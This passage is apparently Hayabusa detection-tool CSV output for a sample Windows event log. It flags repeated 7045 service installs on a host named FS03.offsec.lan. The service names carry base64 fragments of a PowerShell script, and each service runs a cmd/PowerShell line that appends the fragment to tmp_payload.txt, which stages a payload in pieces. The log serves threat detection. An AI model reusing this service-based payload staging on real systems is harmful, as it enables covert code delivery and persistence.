select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:06.043 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:07.496 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:07.496 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:07.496 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:08.937 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:08.937 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:08.937 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:10.406 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:10.406 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:10.406 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:11.900 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:11.900 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:11.900 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:13.355 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:13.355 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:13.355 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:14.807 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:14.807 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:14.807 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:16.238 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:16.238 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:16.238 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:17.691 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:17.691 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:17.691 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:19.164 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:19.164 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:19.164 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:20.628 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:20.628 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:20.628 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:22.226 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:22.226 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:22.226 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:23.680 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:23.680 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:23.680 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
